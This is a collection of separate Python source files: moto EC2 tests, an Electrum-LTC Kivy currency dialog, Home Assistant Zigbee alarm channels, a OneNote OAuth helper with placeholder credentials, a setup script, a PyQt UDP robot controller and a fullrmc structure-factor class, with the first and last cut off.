client = boto3.client("ec2", region_name="us-east-1")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count
)
reservations = client.describe_instances()["Reservations"]
reservations[0]["Instances"].should.have.length_of(instance_count)
instances = reservations[0]["Instances"]
for i in range(0, instance_count):
instances[i]["AmiLaunchIndex"].should.be(i)
@mock_ec2
def test_describe_instance_attribute():
client = boto3.client("ec2", region_name="us-east-1")
security_group_id = client.create_security_group(
GroupName="test security group", Description="this is a test security group"
)["GroupId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
SecurityGroupIds=[security_group_id],
)
instance_id = client.describe_instances()["Reservations"][0]["Instances"][0][
"InstanceId"
]
valid_instance_attributes = [
"instanceType",
"kernel",
"ramdisk",
"userData",
"disableApiTermination",
"instanceInitiatedShutdownBehavior",
"rootDeviceName",
"blockDeviceMapping",
"productCodes",
"sourceDestCheck",
"groupSet",
"ebsOptimized",
"sriovNetSupport",
]
for valid_instance_attribute in valid_instance_attributes:
response = client.describe_instance_attribute(
InstanceId=instance_id, Attribute=valid_instance_attribute
)
if valid_instance_attribute == "groupSet":
response.should.have.key("Groups")
response["Groups"].should.have.length_of(1)
response["Groups"][0]["GroupId"].should.equal(security_group_id)
elif valid_instance_attribute == "userData":
response.should.have.key("UserData")
response["UserData"].should.be.empty
invalid_instance_attributes = [
"abc",
"Kernel",
"RamDisk",
"userdata",
"iNsTaNcEtYpE",
]
for invalid_instance_attribute in invalid_instance_attributes:
with pytest.raises(ClientError) as ex:
client.describe_instance_attribute(
InstanceId=instance_id, Attribute=invalid_instance_attribute
)
ex.value.response["Error"]["Code"].should.equal("InvalidParameterValue")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
message = "Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute.".format(
invalid_instance_attribute=invalid_instance_attribute
)
ex.value.response["Error"]["Message"].should.equal(message)
@mock_ec2
def test_warn_on_invalid_ami():
if settings.TEST_SERVER_MODE:
raise SkipTest("Can't capture warnings in server mode.")
ec2 = boto3.resource("ec2", "us-east-1")
with pytest.warns(
PendingDeprecationWarning,
match=r"Could not find AMI with image-id:invalid-ami.+",
):
ec2.create_instances(ImageId="invalid-ami", MinCount=1, MaxCount=1)
|
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import ObjectProperty, BooleanProperty
from kivy.lang import Builder
Builder.load_string('''
<FxDialog@Popup>
id: popup
title: 'Fiat Currency'
size_hint: 0.8, 0.8
pos_hint: {'top':0.9}
BoxLayout:
orientation: 'vertical'
Widget:
size_hint: 1, 0.1
BoxLayout:
orientation: 'horizontal'
size_hint: 1, 0.1
Label:
text: _('Currency')
height: '48dp'
Spinner:
height: '48dp'
id: ccy
on_text: popup.on_currency(self.text)
Widget:
size_hint: 1, 0.05
BoxLayout:
orientation: 'horizontal'
size_hint: 1, 0.2
Label:
text: _('History rates')
CheckBox:
id:hist
active: popup.has_history_rates
on_active: popup.on_checkbox_history(self.active)
Widget:
size_hint: 1, 0.05
BoxLayout:
orientation: 'horizontal'
size_hint: 1, 0.1
Label:
text: _('Source')
height: '48dp'
Spinner:
height: '48dp'
id: exchanges
on_text: popup.on_exchange(self.text)
Widget:
size_hint: 1, 0.1
BoxLayout:
orientation: 'horizontal'
size_hint: 1, 0.2
Button:
text: 'Cancel'
size_hint: 0.5, None
height: '48dp'
on_release: popup.dismiss()
Button:
text: 'OK'
size_hint: 0.5, None
height: '48dp'
on_release:
root.callback()
popup.dismiss()
''')
from kivy.uix.label import Label
from kivy.uix.checkbox import CheckBox
from kivy.uix.widget import Widget
from kivy.clock import Clock
from electrum_ltc.gui.kivy.i18n import _
from functools import partial
class FxDialog(Factory.Popup):
def __init__(self, app, plugins, config, callback):
self.app = app
self.config = config
self.callback = callback
self.fx = self.app.fx
if self.fx.get_history_config(allow_none=True) is None:
            # If nothing is set, force-enable it. (Note that as fiat rates are
            # themselves disabled by default, it is enough to set this here. If
            # they were enabled by default, this would be too late.)
self.fx.set_history_config(True)
self.has_history_rates = self.fx.get_history_config()
Factory.Popup.__init__(self)
self.add_currencies()
def add_exchanges(self):
ex = self.ids.exchanges
if self.fx.is_enabled():
exchanges = sorted(self.fx.get_exchanges_by_ccy(self.fx.get_currency(), self.has_history_rates))
mx = self.fx.exchange.name()
if mx in exchanges:
ex.text = mx
elif exchanges:
ex.text = exchanges[0]
else:
ex.text = ''
else:
exchanges = []
ex.text = ''
ex.values = exchanges
def on_exchange(self, text):
if not text:
return
if self.fx.is_enabled() and text != self.fx.exchange.name():
self.fx.set_exchange(text)
def add_currencies(self):
currencies = [_('None')] + self.fx.get_currencies(self.has_history_rates)
my_ccy = self.fx.get_currency() if self.fx.is_enabled() else _('None')
self.ids.ccy.values = currencies
self.ids.ccy.text = my_ccy
def on_checkbox_history(self, checked):
self.fx.set_history_config(checked)
self.has_history_rates = checked
self.add_currencies()
self.on_currency(self.ids.ccy.text)
def on_currency(self, ccy):
b = (ccy != _('None'))
self.fx.set_enabled(b)
if b:
if ccy != self.fx.get_currency():
self.fx.set_currency(ccy)
self.app.fiat_unit = ccy
else:
self.app.is_fiat = False
Clock.schedule_once(lambda dt: self.add_exchanges())
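# Minimal usage sketch (hypothetical values; assumes a running Electrum Kivy app
# whose `app.fx` exchange-rate manager is initialised):
#   FxDialog(app, plugins, config, callback=lambda: None).open()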
|
"""
Security channels module for Zigbee Home Automation.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/zha/
"""
import logging
import zigpy.zcl.clusters.security as security
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_send
from . import ZigbeeChannel
from .. import registries
from ..const import (
CLUSTER_COMMAND_SERVER,
SIGNAL_ATTR_UPDATED,
WARNING_DEVICE_MODE_EMERGENCY,
WARNING_DEVICE_SOUND_HIGH,
WARNING_DEVICE_SQUAWK_MODE_ARMED,
WARNING_DEVICE_STROBE_HIGH,
WARNING_DEVICE_STROBE_YES,
)
_LOGGER = logging.getLogger(__name__)
@registries.ZIGBEE_CHANNEL_REGISTRY.register(security.IasAce.cluster_id)
class IasAce(ZigbeeChannel):
"""IAS Ancillary Control Equipment channel."""
pass
@registries.CHANNEL_ONLY_CLUSTERS.register(security.IasWd.cluster_id)
@registries.ZIGBEE_CHANNEL_REGISTRY.register(security.IasWd.cluster_id)
class IasWd(ZigbeeChannel):
"""IAS Warning Device channel."""
@staticmethod
def set_bit(destination_value, destination_bit, source_value, source_bit):
"""Set the specified bit in the value."""
if IasWd.get_bit(source_value, source_bit):
return destination_value | (1 << destination_bit)
return destination_value
@staticmethod
def get_bit(value, bit):
"""Get the specified bit from the value."""
return (value & (1 << bit)) != 0
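    # Worked example: set_bit(0b0000, 3, 0b01, 0) returns 0b1000, because bit 0
    # of the source value is set, so bit 3 of the destination is turned on.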
async def squawk(
self,
mode=WARNING_DEVICE_SQUAWK_MODE_ARMED,
strobe=WARNING_DEVICE_STROBE_YES,
squawk_level=WARNING_DEVICE_SOUND_HIGH,
):
"""Issue a squawk command.
This command uses the WD capabilities to emit a quick audible/visible pulse called a
"squawk". The squawk command has no effect if the WD is currently active
(warning in progress).
"""
value = 0
value = IasWd.set_bit(value, 0, squawk_level, 0)
value = IasWd.set_bit(value, 1, squawk_level, 1)
value = IasWd.set_bit(value, 3, strobe, 0)
value = IasWd.set_bit(value, 4, mode, 0)
value = IasWd.set_bit(value, 5, mode, 1)
value = IasWd.set_bit(value, 6, mode, 2)
value = IasWd.set_bit(value, 7, mode, 3)
await self.device.issue_cluster_command(
self.cluster.endpoint.endpoint_id,
self.cluster.cluster_id,
0x0001,
CLUSTER_COMMAND_SERVER,
[value],
)
async def start_warning(
self,
mode=WARNING_DEVICE_MODE_EMERGENCY,
strobe=WARNING_DEVICE_STROBE_YES,
siren_level=WARNING_DEVICE_SOUND_HIGH,
warning_duration=5, # seconds
strobe_duty_cycle=0x00,
strobe_intensity=WARNING_DEVICE_STROBE_HIGH,
):
"""Issue a start warning command.
This command starts the WD operation. The WD alerts the surrounding area by audible
(siren) and visual (strobe) signals.
strobe_duty_cycle indicates the length of the flash cycle. This provides a means
of varying the flash duration for different alarm types (e.g., fire, police, burglar).
Valid range is 0-100 in increments of 10. All other values SHALL be rounded to the
nearest valid value. Strobe SHALL calculate duty cycle over a duration of one second.
The ON state SHALL precede the OFF state. For example, if Strobe Duty Cycle Field specifies
“40,” then the strobe SHALL flash ON for 4/10ths of a second and then turn OFF for
6/10ths of a second.
"""
value = 0
value = IasWd.set_bit(value, 0, siren_level, 0)
value = IasWd.set_bit(value, 1, siren_level, 1)
value = IasWd.set_bit(value, 2, strobe, 0)
value = IasWd.set_bit(value, 4, mode, 0)
value = IasWd.set_bit(value, 5, mode, 1)
value = IasWd.set_bit(value, 6, mode, 2)
value = IasWd.set_bit(value, 7, mode, 3)
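        # resulting frame layout, as derived from the packing above: bits 0-1
        # carry the siren level, bit 2 the strobe flag, bits 4-7 the warning
        # mode (bit 3 is left unset)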
await self.device.issue_cluster_command(
self.cluster.endpoint.endpoint_id,
self.cluster.cluster_id,
0x0000,
CLUSTER_COMMAND_SERVER,
[value, warning_duration, strobe_duty_cycle, strobe_intensity],
)
@registries.BINARY_SENSOR_CLUSTERS.register(security.IasZone.cluster_id)
@registries.ZIGBEE_CHANNEL_REGISTRY.register(security.IasZone.cluster_id)
class IASZoneChannel(ZigbeeChannel):
"""Channel for the IASZone Zigbee cluster."""
@callback
def cluster_command(self, tsn, command_id, args):
"""Handle commands received to this cluster."""
if command_id == 0:
state = args[0] & 3
async_dispatcher_send(
self._zha_device.hass, f"{self.unique_id}_{SIGNAL_ATTR_UPDATED}", state
)
self.debug("Updated alarm state: %s", state)
elif command_id == 1:
self.debug("Enroll requested")
res = self._cluster.enroll_response(0, 0)
self._zha_device.hass.async_create_task(res)
async def async_configure(self):
"""Configure IAS device."""
# Xiaomi devices don't need this and it disrupts pairing
if self._zha_device.manufacturer == "LUMI":
self.debug("finished IASZoneChannel configuration")
return
from zigpy.exceptions import DeliveryError
self.debug("started IASZoneChannel configuration")
await self.bind()
ieee = self.cluster.endpoint.device.application.ieee
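        # the coordinator's IEEE address is written as the CIE (Control and
        # Indicating Equipment) address so the zone device can enroll with it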
try:
res = await self._cluster.write_attributes({"cie_addr": ieee})
self.debug(
"wrote cie_addr: %s to '%s' cluster: %s",
str(ieee),
self._cluster.ep_attribute,
res[0],
)
except DeliveryError as ex:
self.debug(
"Failed to write cie_addr: %s to '%s' cluster: %s",
str(ieee),
self._cluster.ep_attribute,
str(ex),
)
self.debug("finished IASZoneChannel configuration")
await self.get_attribute_value("zone_type", from_cache=False)
@callback
def attribute_updated(self, attrid, value):
"""Handle attribute updates on this cluster."""
if attrid == 2:
value = value & 3
async_dispatcher_send(
self._zha_device.hass, f"{self.unique_id}_{SIGNAL_ATTR_UPDATED}", value
)
async def async_initialize(self, from_cache):
"""Initialize channel."""
await self.get_attribute_value("zone_status", from_cache=from_cache)
await self.get_attribute_value("zone_state", from_cache=from_cache)
await super().async_initialize(from_cache)
|
"""
PyOneNote.py
~~~~~~~~~~~~~~~~~
This module contains a basic OAuth 2 authentication flow and basic handlers for GET and POST operations.
This work was just a quick hack to migrate notes from an old database to OneNote, but it should help you to understand
the request structure of OneNote.
Copyright (c) 2016 Coffeemug13. All rights reserved. Licensed under the MIT license.
See LICENSE in the project root for license information.
"""
import requests
class OAuth():
"""Handles the authentication for all requests"""
def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None):
""" This information is obtained upon registration of a new Outlook Application
The values are just for information and not valid
:param client_id: "cda3ffaa-2345-a122-3454-adadc556e7bf"
:param client_secret: "AABfsafd6Q5d1VZmJQNsdac"
:param code: = "AcD5bcf9a-0fef-ca3a-1a3a-9v4543388572"
:param token: = "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......"
:param rtoken: = "MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......" """
self.client_id = client_id
self.client_secret = client_secret
self.code = code
        self.token = token
        self.rtoken = refresh_token
        self.expire = None  # set when a token is refreshed
        self.redirect_uri = 'https://localhost'
self.session = requests.Session()
@staticmethod
def get_authorize_url(client_id):
"open this url in a browser to let the user grant access to onenote. Extract from the return URL your access code"
url = "https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost".format(
client_id)
return url
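    # Illustrative flow (hypothetical values): open the returned URL in a
    # browser, sign in and grant access, then copy the "code" query parameter
    # from the redirect, e.g.
    #   https://localhost/?code=AcD5bcf9a-...  ->  code = "AcD5bcf9a-..."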
def get_token(self):
"""
Make the following request with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:authorization_code
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
code:111111111-1111-1111-1111-111111111111
redirect_uri:https://localhost
OneNote will return as result:
{
"token_type": "bearer",
"expires_in": 3600,
"scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
"access_token": "AxxdWR1DBAAUGCCXc8wU/....",
"refresh_token": "DR3DDEQJPCiM2aACbIYa....",
"user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
"""
raise NotImplementedError("")
def refresh_token(self):
"""
        Make the following request to refresh your token with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:refresh_token
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
refresh_token:DR3DDEQJPCiM2aACbIYa....
redirect_uri:https://localhost
-->
{
"token_type": "bearer",
"expires_in": 3600,
"scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
"access_token": "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW...",
"refresh_token": "DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss...",
"user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
"""
url = 'https://login.live.com/oauth20_token.srf'
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"grant_type": "refresh_token",
"client_id": self.client_id,
"client_secret": self.client_secret,
"refresh_token": self.rtoken,
"redirect_uri": self.redirect_uri}
result = self.session.post(url, headers=headers, data=data)
print("Refreshed token: " + result.text)
refresh = result.json()
self.expire = refresh.get('expires_in')
self.token = refresh.get('access_token')
self.rtoken = refresh.get('refresh_token')
print("Token: " + self.token)
print("Refresh Token: " + self.rtoken)
return True
def _get(self, url, query):
"""Handles GET Request with Authentication"""
headers = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
result = self.session.get(url, headers=headers, params=query)
print("GET " + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
    def _post(self, url: str, headers: dict, data: str = None, files: list = None):
"""Handles POST Request with Authentication"""
newHeaders = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
if data:
newHeaders.update(headers)
result = self.session.post(url, headers=newHeaders, data=data)
else:
result = self.session.post(url, headers=newHeaders, files=files)
# result.request.headers
print("POST " + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
    def post(self, url: str, headers: dict, data: str = None, files: list = None):
        """Post something and handle token expiry transparently for the caller."""
try:
result = self._post(url, headers, data=data, files=files)
if (result.status_code not in (200, 201)):
print("Error: " + str(result.status_code))
if (result.status_code == 401):
print("Refreshing token")
if self.refresh_token():
result = self._post(url, headers, data, files=files)
else:
print('Failed retry refreshing token')
return result
        except Exception as e:
            print(e)
            return None
    def get(self, url, query, headers=None):
        """Get something and handle token expiry transparently for the caller."""
try:
result = self._get(url, query)
if (result.status_code != requests.codes.ok):
print("Error: " + str(result.status_code))
if (result.status_code == 401):
print("Refreshing token")
if self.refresh_token():
result = self._get(url, query)
else:
print('Failed retry refreshing token')
return result
        except Exception as e:
            print(e)
            return None
def get_credentials(self):
"""Return the actual credentials of this OAuth Instance
:return client_id:"""
return self.client_id, self.client_secret, self.code, self.token, self.rtoken
class OneNote(OAuth):
"""This class wraps some OneNote specific calls"""
def __init__(self, client_id, client_secret, code, token, rtoken):
super().__init__(client_id, client_secret, code, token, rtoken)
self.base = "https://www.onenote.com/api/v1.0/me/"
def list_notebooks(self):
url = self.base + "notes/notebooks"
query = {'top': '5'}
        result = self.get(url, query)
        n = None
        if result:
            notebooks = result.json()
            n = notebooks["value"][0]
        return n
def post_page(self, section_id: str, created, title: str, content: str, files: list = None):
"""post a page. If you want to provide additional images to the page provide them as file list
in the same way like posting multipart message in 'requests'
.:param content: valid html text with Umlaute converted to ä"""
url = self.base + "notes/sections/" + section_id + "/pages"
headers = {"Content-Type": "application/xhtml+xml"}
# the basic layout of a page is always same
data = """<?xml version="1.0" encoding="utf-8" ?>
<html>
<head>
<title>{0}</title>
<meta name="created" content="{1}"/>
</head>
<body data-absolute-enabled="true">
<div>
{2}
</div>
</body>
</html>
""".format(title, created, content)
result = None
if files:
"post as multipart"
newFiles = [('Presentation', (None, data, 'application/xhtml+xml', {'Content-Encoding': 'utf8'}))]
newFiles.extend(files)
result = self.post(url, {}, None, files=newFiles)
else:
"post as simple request"
result = self.post(url, headers, data)
        notebooks = None
        if result:
            notebooks = result.json()
        return notebooks
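# Minimal usage sketch (illustrative only; every value below is a placeholder):
#
#   on = OneNote(client_id="...", client_secret="...", code=None,
#                token="...", rtoken="...")
#   notebook = on.list_notebooks()  # returns the first notebook, or None
#   # posting a page needs a section id obtained separately from the API:
#   # on.post_page("0-abc123...", "2016-01-01T00:00:00Z", "Title", "<p>Hi</p>")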
|
"""pygments-sisal module setup script for distribution."""
from __future__ import with_statement
import os
import setuptools
def get_version(filename):
with open(filename) as fh:
for line in fh:
if line.startswith('__version__'):
return line.split('=')[-1].strip()[1:-1]
setuptools.setup(
name='pygments-sisal',
version=get_version(os.path.join('pygments_sisal', '__init__.py')),
author='Alexander Asp Bock',
author_email='[email protected]',
platforms='All',
description=('A pygments lexer for SISAL'),
install_requires=['Pygments>=2.0'],
license='MIT',
keywords='pygments, lexer, sisal',
url='https://github.com/MisanthropicBit/pygments-sisal',
packages=setuptools.find_packages(),
long_description=open('README.md').read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5'
],
# Pygments entry point
entry_points="[pygments.lexers]\n"
"sisal=pygments_sisal:SisalLexer"
)
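# Usage note: the entry point above registers SisalLexer with Pygments at
# install time, so, assuming the lexer lists 'sisal' among its aliases, it can
# be invoked as e.g. `pygmentize -l sisal myfile.sis` (the .sis extension is
# only an illustrative assumption).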
|
import sys
from PyQt4 import QtGui, QtCore
import time, socket, json
from main import Ui_MainWindow
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
IP = "localhost"
PORT = 8001
class main_menu(QtGui.QMainWindow):
def __init__(self):
super(main_menu, self).__init__()
self.ui=Ui_MainWindow()
self.ui.setupUi(self)
self.show()
def keyPressEvent(self, event1):
verbose = {"FB":"", "LR":""}
if event1.key() == QtCore.Qt.Key_W:
#print "Up pressed"
verbose["FB"] = "F"
if event1.key() == QtCore.Qt.Key_S:
#print "D pressed"
verbose["FB"] = "B"
if event1.key() == QtCore.Qt.Key_A:
#print "L pressed"
verbose["LR"] = "L"
if event1.key() == QtCore.Qt.Key_D:
#print "R pressed"
verbose["LR"] = "R"
print verbose
json_data=json.dumps(verbose)
s.sendto((json_data), (IP, PORT))
def keyReleaseEvent(self, event):
verbose = {"FB":"", "LR":""}
if event.key() == QtCore.Qt.Key_W:
#print "Up rel"
verbose["FB"] = "S"
if event.key() == QtCore.Qt.Key_S:
#print "D rel"
verbose["FB"] = "S"
if event.key() == QtCore.Qt.Key_A:
#print "L pressed"
verbose["LR"] = "S"
if event.key() == QtCore.Qt.Key_D:
#print "R pressed"
verbose["LR"] = "S"
print verbose
json_data=json.dumps(verbose)
s.sendto((json_data), (IP, PORT))
def main():
app = QtGui.QApplication(sys.argv)
ex = main_menu()
app.exec_()
if __name__ == '__main__':
main()
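# Receiver-side sketch (illustrative only): the robot end is assumed to decode
# the same JSON key-state messages roughly like this:
#
#   r = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   r.bind(("0.0.0.0", PORT))
#   while True:
#       data, addr = r.recvfrom(1024)
#       state = json.loads(data)  # e.g. {"FB": "F", "LR": ""}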
|
"""
StructureFactorConstraints contains classes for all constraints related experimental static structure factor functions.
.. inheritance-diagram:: fullrmc.Constraints.StructureFactorConstraints
:parts: 1
"""
# standard libraries imports
from __future__ import print_function
import itertools, re
# external libraries imports
import numpy as np
from pdbparser.Utilities.Database import is_element_property, get_element_property
from pdbparser.Utilities.Collection import get_normalized_weighting
# fullrmc imports
from ..Globals import INT_TYPE, FLOAT_TYPE, PI, PRECISION, LOGGER
from ..Globals import str, long, unicode, bytes, basestring, range, xrange, maxint
from ..Core.Collection import is_number, is_integer, get_path
from ..Core.Collection import reset_if_collected_out_of_date, get_real_elements_weight
from ..Core.Collection import get_caller_frames
from ..Core.Constraint import Constraint, ExperimentalConstraint
from ..Core.pairs_histograms import multiple_pairs_histograms_coords, full_pairs_histograms_coords
class StructureFactorConstraint(ExperimentalConstraint):
"""
Controls the Structure Factor noted as S(Q) and also called
total-scattering structure function or Static Structure Factor.
    S(Q) is a dimensionless quantity normalized such that the average
    value :math:`<S(Q)>=1`.
    It is worth mentioning that S(Q) is nothing other than the normalized and
    corrected diffraction pattern once all experimental artefacts are removed.
The computation of S(Q) is done through an inverse Sine Fourier transform
of the computed pair distribution function G(r).
.. math::
S(Q) = 1+ \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
    From an atomistic model and histogram point of view, G(r) is computed
    as follows:
.. math::
G(r) = 4 \\pi r (\\rho_{r} - \\rho_{0})
= 4 \\pi \\rho_{0} r (g(r)-1)
= \\frac{R(r)}{r} - 4 \\pi \\rho_{0}
    g(r) is calculated after binning all pair atomic distances into
    weighted histograms as follows:
.. math::
g(r) = \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{\\rho_{i,j}(r)}{\\rho_{0}}
= \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{n_{i,j}(r) / v(r)}{N_{i,j} / V}
Where:\n
:math:`Q` is the momentum transfer. \n
:math:`r` is the distance between two atoms. \n
:math:`\\rho_{i,j}(r)` is the pair density function of atoms i and j. \n
:math:`\\rho_{0}` is the average number density of the system. \n
:math:`w_{i,j}` is the relative weighting of atom types i and j. \n
:math:`R(r)` is the radial distribution function (rdf). \n
:math:`N` is the total number of atoms. \n
:math:`V` is the volume of the system. \n
:math:`n_{i,j}(r)` is the number of atoms i neighbouring j at a distance r. \n
:math:`v(r)` is the annulus volume at distance r and of thickness dr. \n
:math:`N_{i,j}` is the total number of atoms i and j in the system. \n
+----------------------------------------------------------------------+
|.. figure:: reduced_structure_factor_constraint_plot_method.png |
| :width: 530px |
| :height: 400px |
| :align: left |
| |
| Reduced structure factor of memory shape Nickel-Titanium alloy. |
+----------------------------------------------------------------------+
:Parameters:
#. experimentalData (numpy.ndarray, string): Experimental data as
numpy.ndarray or string path to load data using numpy.loadtxt
method.
#. dataWeights (None, numpy.ndarray): Weights array of the same number
of points of experimentalData used in the constraint's standard
error computation. Therefore particular fitting emphasis can be
put on different data points that might be considered as more or less
           important in order to get a reasonable and plausible model.\n
If None is given, all data points are considered of the same
importance in the computation of the constraint's standard error.\n
If numpy.ndarray is given, all weights must be positive and all
zeros weighted data points won't contribute to the total
           constraint's standard error. At least a single weight point is
           required to be non-zero and the weights array will be automatically
           scaled upon setting such that the sum of all the weights
           is equal to the number of data points.
#. weighting (string): The elements weighting scheme. It must be any
atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius) defined
in pdbparser database. In case of xrays or neutrons experimental
weights, one can simply set weighting to 'xrays' or 'neutrons'
and the value will be automatically adjusted to respectively
'atomicNumber' and 'neutronCohb'. If attribute values are
missing in the pdbparser database, atomic weights must be
given in atomsWeight dictionary argument.
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
           atoms element and values are custom weights. If None or a partial
           dictionary is given, missing elements weights will be set
           according to the given weighting scheme.
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
#. scaleFactor (number): A normalization scale factor used to normalize
the computed data to the experimental ones.
#. adjustScaleFactor (list, tuple): Used to adjust fit or guess
the best scale factor during stochastic engine runtime.
It must be a list of exactly three entries.\n
#. The frequency in number of generated moves of finding the best
scale factor. If 0 frequency is given, it means that the scale
factor is fixed.
#. The minimum allowed scale factor value.
#. The maximum allowed scale factor value.
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
           artificial wrinkles; the main reason, among others, is that
           G(r) is computed by applying a sine Fourier transform to the
           experimental structure factor S(q). Therefore a window function is
used to best imitate the numerical artefacts in the experimental
data.
#. limits (None, tuple, list): The distance limits to compute the
           histograms. If None is given, the limits will be automatically
           set to the min and max distance of the experimental data.
Otherwise, a tuple of exactly two items where the first is the
minimum distance or None and the second is the maximum distance
or None.
**NB**: If adjustScaleFactor first item (frequency) is 0, the scale factor
will remain untouched and the limits minimum and maximum won't be checked.
.. code-block:: python
# import fullrmc modules
from fullrmc.Engine import Engine
from fullrmc.Constraints.StructureFactorConstraints import StructureFactorConstraint
# create engine
ENGINE = Engine(path='my_engine.rmc')
# set pdb file
ENGINE.set_pdb('system.pdb')
# create and add constraint
SFC = StructureFactorConstraint(experimentalData="sq.dat", weighting="atomicNumber")
ENGINE.add_constraints(SFC)
"""
def __init__(self, experimentalData, dataWeights=None,
weighting="atomicNumber", atomsWeight=None,
rmin=None, rmax=None, dr=None,
scaleFactor=1.0, adjustScaleFactor=(0, 0.8, 1.2),
windowFunction=None, limits=None):
# initialize variables
self.__experimentalQValues = None
self.__experimentalSF = None
self.__rmin = None
self.__rmax = None
self.__dr = None
self.__minimumDistance = None
self.__maximumDistance = None
self.__bin = None
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
self.__Gr2SqMatrix = None
# initialize constraint
super(StructureFactorConstraint, self).__init__( experimentalData=experimentalData, dataWeights=dataWeights, scaleFactor=scaleFactor, adjustScaleFactor=adjustScaleFactor)
# set atomsWeight
self.set_atoms_weight(atomsWeight)
# set elements weighting
self.set_weighting(weighting)
self.__set_weighting_scheme()
# set window function
self.set_window_function(windowFunction)
# set r parameters
self.set_rmin(rmin)
self.set_rmax(rmax)
self.set_dr(dr)
# set frame data
FRAME_DATA = [d for d in self.FRAME_DATA]
FRAME_DATA.extend(['_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__atomsWeight',
'_StructureFactorConstraint__qmin',
'_StructureFactorConstraint__qmax',
'_StructureFactorConstraint__rmin',
'_StructureFactorConstraint__rmax',
'_StructureFactorConstraint__dr',
'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin',
'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__windowFunction',
'_elementsWeight',] )
RUNTIME_DATA = [d for d in self.RUNTIME_DATA]
RUNTIME_DATA.extend( [] )
object.__setattr__(self, 'FRAME_DATA', tuple(FRAME_DATA) )
object.__setattr__(self, 'RUNTIME_DATA', tuple(RUNTIME_DATA) )
def _codify_update__(self, name='constraint', addDependencies=True):
dependencies = []
code = []
if addDependencies:
code.extend(dependencies)
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name}.set_used({val})".format(name=name, val=self.used))
code.append("{name}.set_scale_factor({val})".format(name=name, val=self.scaleFactor))
code.append("{name}.set_adjust_scale_factor({val})".format(name=name, val=self.adjustScaleFactor))
code.append("{name}.set_data_weights(dw)".format(name=name))
code.append("{name}.set_atoms_weight({val})".format(name=name, val=self.atomsWeight))
code.append("{name}.set_window_function(wf)".format(name=name))
code.append("{name}.set_rmin({val})".format(name=name, val=self.rmin))
code.append("{name}.set_rmax({val})".format(name=name, val=self.rmax))
code.append("{name}.set_dr({val})".format(name=name, val=self.dr))
code.append("{name}.set_limits({val})".format(name=name, val=self.limits))
# return
return dependencies, '\n'.join(code)
def _codify__(self, engine, name='constraint', addDependencies=True):
assert isinstance(name, basestring), LOGGER.error("name must be a string")
assert re.match('[a-zA-Z_][a-zA-Z0-9_]*$', name) is not None, LOGGER.error("given name '%s' can't be used as a variable name"%name)
klass = self.__class__.__name__
